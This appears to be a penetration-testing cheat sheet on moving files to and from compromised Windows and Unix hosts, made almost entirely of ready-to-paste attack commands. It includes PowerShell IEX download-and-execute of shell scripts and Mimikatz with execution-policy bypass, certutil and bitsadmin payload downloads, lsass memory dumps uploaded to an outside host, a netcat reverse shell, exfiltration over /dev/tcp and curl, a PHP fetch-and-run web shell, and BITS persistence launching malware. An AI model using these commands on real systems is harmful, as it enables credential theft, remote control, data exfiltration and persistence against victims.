Basic commands
Copy python -m SimpleHTTPServer 80
php -S 0.0.0.0:80
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.17/nc.exe','c:\temp\nc.exe')
powershell.exe -c (Start-BitsTransfer -Source "http://10.10.14.17/nc.exe -Destination C:\temp\nc.exe")
powershell.exe wget "http://10.10.14.17/nc.exe" -outfile "c:\temp\nc.exe"
certutil.exe -urlcache -split -f "http://10.10.14.17/nc.exe" c:\temp\nc.exe
bitsadmin /transfer job /download /priority high http://10.10.14.17/nc.exe c:\temp\nc.exe
powershell -c "Invoke-WebRequest -Uri http://10.10.15.150/41020.exe -OutFile C:\Users\kostas\Desktop\41020.exe"
powershell Invoke-WebRequest http://10.10.14.10/nc.exe -OutFile nc.exe
powershell.exe IEX(New-Object System.Net.WebClient).DownloadString('http://ip/script.ps1')
powershell -exec bypass -command "IEX (New-Object System.Net.WebClient).DownloadString('http://$PENTEST_BOX_IP/Invoke-Mimikatz.ps1');Invoke-Mimikatz" execute ps1 files
Copy powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File jaws.ps1
powershell.exe -ExecutionPolicy Bypass -File jaws.ps1 load it into the memory
Copy IEX(New-Object Net.WebClient).downloadString('http://10.10.15.189:9999/jaws-enum.ps1')
powershell iex(new-object net.webclient).downloadstring(\"http://10.10.14.14/shell.ps1\")
powershell IEX(New-Object Net.WebClient).downloadstring(\"http://10.10.14.14/shell.ps1\") ninja1
Copy echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.15.189:9999/jaws-enum.ps1" >>wget.ps1
echo $file = "jaws.ps1" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1 SMB
Copy python3 /usr/share/doc/python3-impacket/examples/smbserver.py a . -smb2support
net view \\10.10.14.17
copy \\10.10.14.17\a\nc.exe .
copy nc2.exe \\10.10.14.17\a\nc2.exe SMB with password + lsass dump
Copy python3 /usr/share/doc/python3-impacket/examples/smbserver.py a . -smb2support -debug -comment "use it" -username admin -password 123 -ts
C:\>net use s: \\10.201.69.16\a /user:admin 123
S:\>procdump.exe -ma lsass.exe c:\TEMP\a.txt
copy c:\TEMPa.txt.dmp s: Execute nc via SMB (bypass defenses)
Copy \\10.10.14.17\SHARE\nc.exe -nv 10.10.14.17 4444 -e cmd.exe netcat
Copy ncat -lvp 80 > nc2.exe
nc -nv 10.10.14.17 < nc.exe -w 15 copy files from target to kali
Copy .\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 608 C:\temp\lsass.dmp full
powershell -nop -w 1 -sta (New-Object System.Net.WebClient).UploadFile(\"http://10.9.4.210:9999/\", \"lsass.dmp\")
powershell -nop -w 1 -sta (New-Object System.Net.WebClient).UploadFile('http://10.92.137.181:8888', 'zzzzzz.txt.dmp')
nc -lvp 9999 > lsasss.dmp with PHP
Copy echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php HTTP-POST
Copy http-post.py
./curl -F 'file=@firefox.exe_190824_231811.dmp' 10.10.15.213:8000/ -v /dev/tcp
Copy cat xxx.zip > /dev/tcp/10.x.x.x.x/9001
nc -lvp 9001 > xxx.zip fetch (OpenBSD)
Copy fetch http://10.11.0.244/exploit.c
<?php system("fetch -o /usr/local/databases/shell.php http://10.11.0.244/shell.php; php /usr/local/databases/shell.php"); ?> rdesktop or remmina
Copy rdesktop -r disk:tmp=/home/user/Desktop <remote ip address> BITS
Download file into the C:\Windows folder.
Copy > bitsadmin /create download
> bitsadmin /addfile download https://<site>/malware.exe c:\windows\malware.exe
> bitsadmin /resume download
> bitsadmin /complete download
Created job {EA8603EB-7CC2-44EC-B1EE-E9923290C2ED}.
Added https://<site>/malware.exe -> c:\windows\malware.exe to job.
Job resumed.
Job completed. Create persistence.
Copy > bitsadmin /create persistence
> bitsadmin /addfile persistence http://127.0.0.1/invalid.exe c:\windows\i.exe
> bitsadmin /SetNotifyCmdLine persistence c:\windows\malware.exe NULL
> bitsadmin /resume persistence Updog is a replacement for Python's SimpleHTTPServer. It allows uploading and downloading via HTTP/S, can set ad hoc SSL certificates and use http basic auth.
or simply:
Copy python -m SimpleHTTPServer 8080 or HTTPS with upload 😎
References
